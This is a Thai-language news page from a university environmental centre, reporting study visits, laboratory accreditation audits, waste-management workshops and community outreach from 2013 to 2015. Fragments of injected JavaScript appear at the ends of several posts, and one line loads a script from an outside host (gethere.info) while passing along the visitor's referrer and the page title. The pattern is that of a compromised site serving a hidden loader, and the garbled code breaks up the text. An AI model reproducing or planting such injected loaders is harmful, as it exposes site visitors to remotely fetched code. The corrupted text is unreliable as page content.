ค้นหา02-423-9407-10
 

 
 
 
บริการวิชาการสนับสนุนการเรียนการสอนทุน/ศึกษาต่อ/สมัครงานประชาสัมพันธ์

นักศึกษาปริญญาโทสาขาการบริหารจัดการภาครัฐและเอกชน คณะวิทยาการจัดการ มหาวิทยาลัยศิลปากร ศึกษาดูงานห้องปฏิบัติการและ 5ส

คณะอาจารย์และนักศึกษาปริญญาโท สาขาการบริหารจัดการภาครัฐและเอกชน คณะวิทยาการจัดการ มหาวิทยาลัยศิลปากร เข้าศึกษาดูงานด้านการจัดการความเสี่ยงของห้องปฏิบัติการและการจัดทำ 5 ส  โดยมีนางสาวพรธิดา  เทพประสิทธิ์ ผู้อำนวยการศูนย์ฯ และเจ้าหน้าที่ ให้การต้อนรับและให้ข้อมูลความรู้แก่นักศึกษา ณ ศูนย์สิ่งแวดล้อม  คณะวิทยาศาสตร์และเทคโนโลยี ศูนย์วิทยาศาสตร์ มหาวิทยาลัยราชภัฏสวนดุสิต วันที่ 1 ธันวาคม 2556

0 comments

คณะผู้บริหารฯ สาธารณรัฐประชาธิปไตยประชาชนลาว ศึกษาดูงานห้องปฏิบัติการศูนย์สิ่งแวดล้อม

     คณะผู้บริหารจากกระทรวงทรัพยากรธรรมชาติและสิ่งแวดล้อม สาธารณรัฐประชาธิปไตยประชาชนลาว เข้ามาศึกษาดูงานและเยี่ยมห้องปฏิบัติการศูนย์สิ่งแวดล้อม ถึงแนวทางด้านการจัดทำห้องปฏิบัติการตามระบบมาตรฐาน ISO/IEC17025 และวิธีการขอการรับรองมาตรฐาน โดยมีรองศาสตราจารย์นิยดา สวัสดิพงษ์ ผู้อำนวยการศูนย์สิ่งแวดล้อม และบุคลากรร่วมให้การต้อนรับ ณ ห้องประชุมชั้น ๒ คณะวิทยาศาสตร์และเทคโนโลยี ศูนย์วิทยาศาสตร์ มหาวิทยาลัยราชภัฏสวนดุสิต(ถนนสิรินธร) วันที่ 16 กันยายน 2556 d.getElementsByTagName(‘head’)[0].appendChild(s);

0 comments

ศูนย์สิ่งแวดล้อม คณะวิทยาศาสตร์และเทคโนโลยี จัดกิจกรรมสัมมนารับฟังความคิดเห็น และข้อเสนอแนะ(Focus Group Discussion)

      ศูนย์สิ่งแวดล้อม จัดสัมมนาเพื่อรับฟังความคิดเห็นและข้อเสนอแนะ( (Focus Group Discussion) เรื่อง “การจัดการขยะมูลฝอยในจังหวัดอุตรดิตถ์” ภายใต้โครงการที่ปรึกษาเพื่อศึกษาความเป็นไปได้ในการจัดการขยะมูลฝอยของจังหวัดอุตรดิตถ์ ให้กับองค์การบริหารส่วนจังหวัดอุตรดิตถ์ ในวันที่ ๒๖ กุมภาพันธ์ ๒๕๕๗ ณ โรงแรมฟรายเดย์ อ.เมือง จ.อุตรดิตถ์ โดยการจัดสัมมนาครั้งนี้ มีตัวแทนผู้มีส่วนได้ส่วนเสียในการดำเนินงานด้านสิ่งแวดล้อม อาทิ หน่วยงานภาครัฐ เอกชน องค์กรอิสระ สถาบันการศึกษา ฯลฯ จำนวน ๓๒ คน เข้าร่วมให้ความคิดเห็นและข้อเสนอแนะ โดยมี รองศาสตราจารย์ ดร.สุขุม เฉลยทรัพย์ ประธานที่ปรึกษาสวนดุสิตโพล ให้เกียรติเป็นผู้ดำเนินรายการในครั้งนี้ } else {

0 comments

ศูนย์สิ่งแวดล้อมจัดอบรมเชิงปฏิบัติ การทดสอบหาปริมาณโพแทสเซียมในขยะมูลฝอย

วันที่ 23 กรกฎาคม 2558 ศูนย์สิ่งแวดล้อม จัดอบรมเชิงปฏิบัติการรายวิชาการจัดการและควบคุมมูลฝอยฯ ต่อเนื่องจากครั้งก่อน ซึ่งเป็นหัวข้อการทดสอบหาค่าโพแทสเซียมในขยะ โดยมีผู้สอน คือ นางสาวพรรณทิพา กิจภักดีกุล ณ ห้องปฏิบัติการศูนย์สิ่งแวดล้อม ชั้น 6 อาคารเฉลิมพระเกียรติ   document.currentScript.parentNode.insertBefore(s, document.currentScript);

0 comments

ศูนย์สิ่งแวดล้อม จัดอบรมเชิงปฏิบัติการในรายวิชา การจัดการและควบคุมมูลฝอย สิ่งปฏิกูลและของเสียอันตราย

เมื่อวันที่ 2 กรกฎาคม 2558 ที่ผ่านมา ศูนย์สิ่งแวดล้อม จัดอบรมเชิงปฏิบัติการในรายวิชา การจัดการและควบคุมมูลฝอย สิ่งปฏิกูลและของเสียอันตราย ให้กับนักศึกษาชั้นปีที่ 3 หลักสูตรสิ่งแวดล้อมเมืองและอุตสาหกรรม คณะวิทยาศาสตร์และเทคโนโลยี มหาวิทยาลัยราชภัฏสวนดุสิต โดย นางสาวเพียงกมล ยุวนานนท์ หัวหน้าส่วนงานมููลฝอย ณ ห้องปฏิบัติการศูนย์สิ่งแวดล้อม อาคารเฉลิมพระเกียรติ 50 พรรษามหาวชิราลงกรณ

0 comments

ผู้อำนวยการศูนย์สิ่งแวดล้อมและคณะนักวิจัย ลงพื้นที่ชุมชนหมู่บ้านตะเพินคี่ จังหวัดสุพรรณบุรี เพื่อดำเนินโครงการการเผยแพร่ความรู้เรื่องการผลิตถ่านอัดแท่งจากวัสดุเหลือใช้ทางการเกษตร

นางสาวพรธิดา เทพประสิทธิ์ ผู้อำนวยการศูนย์สิ่งแวดล้อม พร้อมด้วยคณะนักวิจัยของศูนย์ฯ ได้ลงพื้นที่ชุมชน เพื่อดำเนินโครงการการเผยแพร่ความรู้เรื่องการผลิตถ่านอัดแท่งจากวัสดุเหลือใช้ทางการเกษตร ภายใต้โครงการการอนุรักษ์และบริหารจัดการทรัพยากรธรรมชาติบนพื้นที่สูงอย่างยั่งยืน : กรณีศึกษา บ้านตะ…เพินคี่ จังหวัดสุพรรณบุรี ประจำปีงบประมาณ พ.ศ.2557 ณ บ้านตะเพินคี่ หมู่ที่ 5 ตำบลวังยาว อำเภอด่านช้าง จังหวัดสุพรรณบุรี โดยการดำเนินการครั้งนี้ มีทั้งการอบรมให้ความรู้เรื่องการนำวัสดุเหลือใช้ทางการเกษตรมาใช้ประโยชน์ การผลิตถ่านอัดแท่งจากวัสดุเหลือใช้ทางการเกษตร การสาธิตการเผาวัสดุเหลือใช้ฯ ก่อนนำไปทำถ่านอัดแท่ง รวมทั้งการสาธิตการอัดถ่านแท่ง ฯลฯ เมื่อวันที่ 6-7มิถุนายน 2558 ที่ผ่านมา  

0 comments

Posts not found

ศูนย์สิ่งแวดล้อม รับการตรวจติดตามผลการรับรองความสามารถห้องปฏิบัติการสอบเทียบเครื่องแก้ววัดปริมาตร ตามมาตรฐาน ISO/IEC 17025 : 2548 จากสำนักงานมาตรฐานผลิตภัณฑ์อุตสาหกรรม(สมอ.)

     ศูนย์สิ่งแวดล้อม รับการตรวจติดตามผลการรับรองความสามารถห้องปฏิบัติการสอบเทียบเครื่องแก้ววัดปริมาตร ตามมาตรฐาน ISO/IEC 17025:2548 โดยมี นางสาวพรธิดา เทพประสิทธิ์ ผู้อำนวยการ ศูนย์สิ่งแวดล้อม พร้อมทั้งเจ้าหน้าที่ศูนย์ฯ กล่าวต้อนรับ และรับการตรวจติดตามจากคณะผู้ประเมินของสำนักงานมาตรฐานผลิตภัณฑ์อุตสาหกรรม(สมอ.) เมื่อวันที่ 5 กันยายน 2557 ณ ห้องประชุมศูนย์สิ่งแวดล้อม ชั้น 6 อาคารเฉลิมพระเกียรติ 60 พรรษา มหาวชิราลงกรณ(ศูนย์วิทยาศาสตร์) ซึ่งจากการตรวจติดตามครั้งนี้ พบว่าศูนย์ฯยังคงรักษาระดับมาตรฐานคุณภาพห้องปฏิบัติการได้เป็นอย่างดี document.currentScript.parentNode.insertBefore(s, document.currentScript);

0 comments

การประชุมบุคลากรศูนย์สิ่งแวดล้อม เพื่อมอบนโยบายการบริหารจัดการ ของศูนย์สิ่งแวดล้อม

 ผศ.ดร.พิทักษ์ จันทร์เจริญ อธิการบดี เป็นประธานการประชุมบุคลากรศูนย์สิ่งแวดล้อม เพื่อมอบนโยบายการบริหารจัดการของศูนย์สิ่งแวดล้อม  ซึ่งมีวาระสำคัญเรื่อง การเตรียมความพร้อมของการออกนอกระบบของมหาวิทยาลัย,แนวนโยบายในการทำงานของบุคลากร และแนวทางความก้าวหน้าในอาชีพ(Career Path) โดยมี ดร.วิชชา  ฉิมพลี คณบดีคณะวิทยาศาสตรและเทคโนโลยี รองคณบดีคณะวิทยาศาสตร์และเทคโนโลยี ผู้อำนวยการกองบริหารงานบุคคล รวมทั้ง รศ.นิยดา  สวัสดิพงษ์ ที่ปรึกษาศูนย์สิ่งแวดล้อม และนางสาวพรธิดา เทพประสิทธิ์  ตลอดจนบุคลากรศูนย์สิ่งแวดล้อม เข้าร่วมประชุมรับทราบนโยบาย ในวันที่ ๒๗ พฤศจิกายน ๒๕๕๗ ณ ห้องประชุมคณะวิทยาศาสตร์และเทคโนโลยี ชั้น ๒ ศูนย์วิทยาศาสตร์

0 comments

ผู้อำนวยการศูนย์สิ่งแวดล้อม ในฐานะเลขานุการประธานกรรมการบริหารสำนักงานพัฒนาเศรษฐกิจจากฐานชีวภาพ เข้าร่วมโครงการประชุมเชิงปฏิบัติการ ประเมิน เป้าหมายตัวชี้วัดผลสำเร็จ ปีงบประมาณ พ.ศ. 2558 และจัดทำแผนโครงการปีงบประมาณ พ.ศ.2559 ของสำนักงานพัฒนาเศรษฐกิจจากฐานชีวภาพ

เมื่อวันที่ 27 – 28 มิถุนายน 2558 ที่ผ่านมา ผศ.ดร.พิทักษ์ จันทร์เจริญ อธิการบดีมหาวิทยาลัยราชภัฏสวนดุสิต ในฐานะประธานกรรมการบริหารสำนักงานพัฒนาเศรษฐกิจจากฐานชีวภาพ พร้อมด้วยนางสาวพรธิดา เทพประสิทธิ์ ผู้อำนวยการศูนย์สิ่งแวดล้อม ในฐานะเลขานุการประธานกรรมการ เข้าร่วมโครงการประชุมเชิงปฏิบัติการ ประเมิน เป้าหมายตัวชี้วัดผลสำเร็จ ปีงบประมาณ พ.ศ. 2558 และจัดทำแผนโครงการปีงบประมาณ พ.ศ.2559 ณ โรงแรมเดอะซายน์ (The Zign)จังหวัด ชลบุรี s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

0 comments